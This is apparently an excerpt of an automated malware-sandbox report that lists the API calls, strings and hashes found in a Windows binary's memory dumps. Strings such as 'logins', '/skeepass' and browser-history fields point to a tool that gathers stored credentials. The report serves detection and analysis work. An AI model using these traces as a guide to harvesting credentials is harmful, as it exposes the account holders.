                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                • API String ID: 4054529287-3175352466
                                • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                • API String ID: 3143752011-1996832678
                                • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                • API String ID: 667068680-2887671607
                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                • API String ID: 1607361635-601624466
                                • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _snwprintf$memset$wcscpy
                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                • API String ID: 2000436516-3842416460
                                • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                 • String ID:
                                 • API String ID: 1043902810-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                • memset.MSVCRT ref: 0040E380
                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                • wcschr.MSVCRT ref: 0040E3B8
                                • memcpy.MSVCRT ref: 0040E3EC
                                • memcpy.MSVCRT ref: 0040E407
                                • memcpy.MSVCRT ref: 0040E422
                                • memcpy.MSVCRT ref: 0040E43D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                 • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                 • API String ID: 3073804840-2252543386
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: ??2@??3@_snwprintfwcscpy
                                 • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                 • API String ID: 2899246560-1542517562
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                 • String ID:
                                 • API String ID: 3715365532-3916222277
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040DBCD
                                • memset.MSVCRT ref: 0040DBE9
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                • wcscpy.MSVCRT ref: 0040DC2D
                                • wcscpy.MSVCRT ref: 0040DC3C
                                • wcscpy.MSVCRT ref: 0040DC4C
                                • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                • wcscpy.MSVCRT ref: 0040DCC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                 • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                 • API String ID: 3330709923-517860148
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                • memset.MSVCRT ref: 0040806A
                                • memset.MSVCRT ref: 0040807F
                                • _wtoi.MSVCRT ref: 004081AF
                                • _wcsicmp.MSVCRT ref: 004081C3
                                • memset.MSVCRT ref: 004081E4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                 • String ID: logins$null
                                 • API String ID: 3492182834-2163367763
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                • memset.MSVCRT ref: 004085CF
                                • memset.MSVCRT ref: 004085F1
                                • memset.MSVCRT ref: 00408606
                                • strcmp.MSVCRT ref: 00408645
                                • _mbscpy.MSVCRT ref: 004086DB
                                • _mbscpy.MSVCRT ref: 004086FA
                                • memset.MSVCRT ref: 0040870E
                                • strcmp.MSVCRT ref: 0040876B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                 • String ID: ---
                                 • API String ID: 3437578500-2854292027
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0041087D
                                • memset.MSVCRT ref: 00410892
                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                • GetSysColor.USER32(0000000F), ref: 00410999
                                • DeleteObject.GDI32(?), ref: 004109D0
                                • DeleteObject.GDI32(?), ref: 004109D6
                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                 • String ID:
                                 • API String ID: 1010922700-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                • malloc.MSVCRT ref: 004186B7
                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                • malloc.MSVCRT ref: 004186FE
                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: ??3@$FullNamePath$malloc$Version
                                 • String ID: |A
                                 • API String ID: 4233704886-1717621600
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: _wcsicmp
                                 • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                 • API String ID: 2081463915-1959339147
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                 • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                 • API String ID: 2012295524-70141382
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: AddressProc$HandleModule
                                 • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                 • API String ID: 667068680-3953557276
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetDC.USER32(00000000), ref: 004121FF
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                • SelectObject.GDI32(?,?), ref: 00412251
                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                • SetCursor.USER32(00000000), ref: 004122BC
                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                • memcpy.MSVCRT ref: 0041234D
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                 • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                 Similarity
                                 • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                 • String ID:
                                 • API String ID: 1700100422-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetClientRect.USER32(?,?), ref: 004111E0
                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                Similarity
                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                • String ID:
                                • API String ID: 552707033-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                • memcpy.MSVCRT ref: 0040C11B
                                • strchr.MSVCRT ref: 0040C140
                                • strchr.MSVCRT ref: 0040C151
                                • _strlwr.MSVCRT ref: 0040C15F
                                • memset.MSVCRT ref: 0040C17A
                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                Strings
                                Similarity
                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                • String ID: 4$h
                                • API String ID: 4066021378-1856150674
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Similarity
                                • API ID: memset$_snwprintf
                                • String ID: %%0.%df
                                • API String ID: 3473751417-763548558
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                • GetTickCount.KERNEL32 ref: 0040610B
                                • GetParent.USER32(?), ref: 00406136
                                • SendMessageW.USER32(00000000), ref: 0040613D
                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                Strings
                                Similarity
                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                • String ID: A
                                • API String ID: 2892645895-3554254475
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
